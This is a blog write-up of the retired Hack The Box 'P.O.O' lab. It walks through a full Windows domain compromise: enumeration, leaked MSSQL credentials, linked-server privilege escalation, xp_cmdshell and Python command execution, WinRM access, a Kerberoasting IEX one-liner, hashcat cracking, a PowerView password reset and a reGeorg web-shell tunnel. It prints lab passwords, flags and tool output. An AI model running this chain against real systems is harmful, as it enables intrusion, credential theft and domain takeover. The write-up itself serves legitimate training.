Hack the Box – P.O.O ( writeup as of box retired by june 2020 )

As normal I add the IP of the machine to /etc/hosts as poo.htb
To start off with, I perform a port discovery to see what I could find.
nmap -p- -sT -sV -sC -oN initial-scan

E:\PENTEST>nmap -A -oN htb-endgame-xen
Starting Nmap 7.70 ( ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for (
Host is up (0.024s latency).
Not shown: 997 filtered ports
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| sequence of commands
| sequence of commands
| Hello:
| EHLO Invalid domain address.
| Help:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject:
| Subject Alternative Name:
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
1 24.00 ms
2 24.00 ms (

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

It seems we have discovered a few ports open. I chose not to perform a UDP scan at this point in the exercise. It seems we have HTTP on port 80 and MSSQL on 1433.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80.

I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful.
wfuzz –hc 404 -w raft-small-words.txt

wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ

The interesting ones for me to look at seemed to be the ‘admin’ folder and ‘.DS_Store’ file. Simply because admin indicates an area of privilege and .DS_Store files generally hold information about the folder that it resides in.
Admin Directory
I browsed to and was presented with a logon.

I chose not to try and brute force this at this point and looked at the other files I could potentially utilise.

Reading Directories
Knowing the DS_Store files contain information, I read the file to see what it contained. I did this by using


We have some interesting directories. I run IIS Shortname scanner located at to see if I could come up with anything interesting and one specific directory came up with good information.

java -jar iis_shortname_scanner.jar 2 20

I tried a couple of filenames and then hit the jackpot with poo_connection.txt.

This seemed to be details to a SQL database. And we have our first flag.


Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SQL Access
For SQL access, I booted up my Windows machine and used SQL Management studio. I attempted to log in with the details that we found.

And we have a successful login.
I then proceeded to create a new user puckie for myself.

Now that I had created the user, I attempted to log in as the new user.
Now that I was logged in as a new user, I could see we had an additional database called flag.
USE flag Select * FROM dbo.flag
This gave us another flag.

Creating an sql user puckie  in sql studio

EXEC ('select current_user') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''puckie'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];


SHELL Access
I needed to enable xp_cmdshell

Now that I had sysadmin rights on the box, I decided to use to try and gain a shell on the box.
python3 from

I was unable to read anything from the web.config file. I tried to output it but got Access Denied.

After a little bit of looking around on the system, I noticed that Python seems to be installed on the system.

xp_cmdshell whoami

EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("type c:\inetpub\wwwroot\web.config");';

Admin Page

Finding this easier to do within SQL Management Studio, I tried reading the contents of the web.config file.
And this gave us the contents of the config file which showed a username and password.
Administrator EverybodyWantsToWorkAtP.O.O.
I immediately went back to the admin page and attempted to log in with the details shown.
A successful login to the page revealed the next flag.


IPv6 and WinRM
I tried everything to get a good reverse shell on the box, but it seemed the firewall was blocking all traffic.
netsh advfirewall firewall show rule name=”Block network access for R local user accounts in SQL Server instance POO_PUBLIC”

And then I noticed an IPv6 address and another adapter.

I performed an additional scan on the IPv6 address.

kali@kali:~/htb$ nmap -p- -6 -oN ipv6-scan dead:babe::1001
Starting Nmap 7.80 ( ) at 2020-04-16 05:40 EDT
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 9.44% done; ETC: 05:43 (0:02:34 remaining)
Nmap scan report for dead:babe::1001
Host is up (0.026s latency).
Not shown: 65532 filtered ports
80/tcp open http
1433/tcp open ms-sql-s
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds

I noticed there was an additional port open. We have WinRM on 5985. I had credentials and now tried to access this through WinRM. I made the necessary changes to my hosts file first.

dead:babe::1001 poov6.htb

I decided to use alamot winrm located at for this.
I changed the required fields and attempted to connect.

ruby winrm_shell_with_upload.rb

Or use Evil-winrm to find the 4th flag

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i poov6.htb -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt

I wanted to see what I could find out about the domain. Knowing that it is on a domain, I was hoping for some Kerberos tokens that I could potentially crack. I would have to utilise the MSSQL account that I had created earlier..

I logged back in through the SQL Shell that I had earlier.

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('c:\temp\kerberoasting.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

This come back with 2 accounts.

This one was named p00_hr.

This one was named p00_adm.

I copied the contents of these tokens to separate files named user-p00_hr and user-p00_adm.
Now I had to try and crack the passwords on these.

I proceeded to run these 2 tokens through hashcat and run them with the best64 rule.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule

The p00_hr account came back quickly.

However, when I run the p00_adm account through rockyou, it did not return any results. I then decided to run the token through all passwords found in all text files that lay within the SecLists folders.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt /opt/SecLists/Passwords/*.txt --force -r /usr/share/hashcat/rules/best64.rule

And this eventually found a result in the Keyboard-Combinations.txt file.

Now that I had both these passwords cracked. I needed to try and gain access to the domain controller which was on

Domain details
I now uploaded PowerView.ps1 to the temp folder and imported it into PowerShell.
Import-Module .\PowerView.ps1

Once I had created all the variables necessary, I then tried to get the user information on the domain.

get-netuser -DomainController dc -Credential $cred

Looking through the list of users on the domain, I noticed one which was interesting.
This was an account names mr3ks

PowerView / Domain Password
After looking at the powerview version that I was using, I found another version that seemed a little more user friendly at

This also gave me the option to set domain user passwords. I was not aware if I had the relevant permissions to set a user password yet, but I thought I would give it a shot.

UPLOAD /opt/htb/endgame/poo/sdup.ps1
Import-Module .\PowerView.ps1
$Username = 'p00_adm'
$Password = 'ZQ!5t4r'
$pass = ConvertTo-SecureString -AsPlainText 
$Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList 
Set-DomainUserPassword -Identity mr3ks -Password $pass -Credential $Cred

I didn’t get an error from this; therefore, I can only assume at this point that the password change has been successful. I tried to connect via PowerShell but this did not seem to want to connect.

I was now forced to try and get a tunnel running to see if this would help with the WinRM situation. I uploaded the aspx shell into the root folder

UPLOAD /opt/tunnels/tunnel.aspx c:\inetpub\wwwroot\shell.aspx

I then browsed to the tunnel to see if it would activate.

To my surprise, it worked. Now for me to create my tunnel with reGeorge.

python ./ -p 10000 -u

I knew the IP of the Domain Controller from earlier, therefore I changed the WinRM scripts to reflect this and input the mr3ks username and password.

proxychains ruby winrmdc_shell_with_ipload.rb

This provided me with Direct access to the Domain Controller as a domain admin.
I could now look for the final flag.

This exercise got me from being on the outside of the network with simply HTTP and MSSQL as the open ports, to then being able to take complete control of the domain.
If aspx or asp files fail to execute, look at the operating system. In this case it was 2016.
(get-wmiobject win32_operatingsystem).name
If this is the case, and you have admin rights like we did here, then you can install the .NET tools to get the aspx executing. To do this, in a shell, simply type;
dism /online /enable-feature /featurename:NerFx4Extended-ASPNET45 -All


kali@kali:~/htb$ python -p 1433 external_user:#p00Public3xt3rnalUs3r#@ 
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL> help

lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd



msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against

[*] - Attempting to connect to the database server at as external_user...
[+] - Connected.
[*] - SQL Server Name: COMPATIBILITY
[*] - Domain Name: POO
[+] - Found the domain sid: 010500000000000515000000af91e18f681dda440dfef7b0
[*] - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] - - POO\Administrator
[*] - - POO\Guest
[*] - - POO\krbtgt
[*] - - POO\DefaultAccount
[*] - - POO\Domain Admins
[*] - - POO\Domain Users
[*] - - POO\Domain Guests
[*] - - POO\Domain Computers
[*] - - POO\Domain Controllers
[*] - - POO\Cert Publishers
[*] - - POO\Schema Admins
[*] - - POO\Enterprise Admins
[*] - - POO\Group Policy Creator Owners
[*] - - POO\Read-only Domain Controllers
[*] - - POO\Cloneable Domain Controllers
[*] - - POO\Protected Users
[*] - - POO\Key Admins
[*] - - POO\Enterprise Key Admins
[*] - - POO\RAS and IAS Servers
[*] - - POO\Allowed RODC Password Replication Group
[*] - - POO\Denied RODC Password Replication Group
[*] - - POO\mr3ks
[*] - - POO\DC$
[*] - - POO\DnsAdmins
[*] - - POO\DnsUpdateProxy
[*] - - POO\p00_hr
[*] - - POO\p00_dev
[*] - - POO\p00_adm
[*] - - POO\P00 Help Desk
[+] - 31 user accounts, groups, and computer accounts were found.
[*] - Query results have been saved to: /home/kali/.msf4/loot/20200416050427_default_10.13.38.11_mssql.domain.acc_738433.txt
[*] Auxiliary module execution completed

msf5 auxiliary(admin/mssql/mssql_enum) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts
rhosts =>
msf5 auxiliary(admin/mssql/mssql_enum) > set username external_user
username => external_user
msf5 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against

[*] - Running MS SQL Server Enumeration...
[*] - Version:
[*] Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64) 
[*] Jun 15 2019 00:26:19 
[*] Copyright (C) 2017 Microsoft Corporation
[*] Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] - Configuration Parameters:
[*] - C2 Audit Mode is Not Enabled
[*] - xp_cmdshell is Enabled
[*] - remote access is Enabled
[*] - allow updates is Not Enabled
[*] - Database Mail XPs is Not Enabled
[*] - Ole Automation Procedures are Not Enabled
[*] - Databases on the server:
[*] - Database name:master
[*] - Database Files for master:
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\master.mdf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\mastlog.ldf
[*] - Database name:tempdb
[*] - Database Files for tempdb:
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb.mdf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\templog.ldf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_2.ndf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_3.ndf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_4.ndf
[*] - Database name:POO_PUBLIC
[*] - Database Files for POO_PUBLIC:
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_dat.mdf
[*] - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_log.ldf
[*] - System Logins on this Server:
[*] - sa
[*] - external_user
[*] - Disabled Accounts:
[*] - No Disabled Logins Found
[*] - No Accounts Policy is set for:
[*] - All System Accounts have the Windows Account Policy Applied to them.
[*] - Password Expiration is not checked for:
[*] - sa
[*] - external_user
[*] - System Admin Logins on this Server:
[*] - sa
[*] - Windows Logins on this Server:
[*] - No Windows logins found!
[*] - Windows Groups that can logins on this Server:
[*] - No Windows Groups where found with permission to login to system.
[*] - Accounts with Username and Password being the same:
[*] - No Account with its password being the same as its username was found.
[*] - Accounts with empty password:
[*] - No Accounts with empty passwords where found.
[*] - Stored Procedures with Public Execute Permission found:
[*] - sp_replsetsyncstatus
[*] - sp_replcounters
[*] - sp_replsendtoqueue
[*] - sp_resyncexecutesql
[*] - sp_prepexecrpc
[*] - sp_repltrans
[*] - sp_xml_preparedocument
[*] - xp_qv
[*] - xp_getnetname
[*] - sp_releaseschemalock
[*] - sp_refreshview
[*] - sp_replcmds
[*] - sp_unprepare
[*] - sp_resyncprepare
[*] - sp_createorphan
[*] - xp_dirtree
[*] - sp_replwritetovarbin
[*] - sp_replsetoriginator
[*] - sp_xml_removedocument
[*] - sp_repldone
[*] - sp_reset_connection
[*] - xp_fileexist
[*] - xp_fixeddrives
[*] - sp_getschemalock
[*] - sp_prepexec
[*] - xp_revokelogin
[*] - sp_execute_external_script
[*] - sp_resyncuniquetable
[*] - sp_replflush
[*] - sp_resyncexecute
[*] - xp_grantlogin
[*] - sp_droporphans
[*] - xp_regread
[*] - sp_getbindtoken
[*] - sp_replincrementlsn
[*] - Instances found on this server:
[*] - Default Server Instance SQL Server Service is running under the privilege of:
[*] - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) >

Author – Puckiestyle


Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *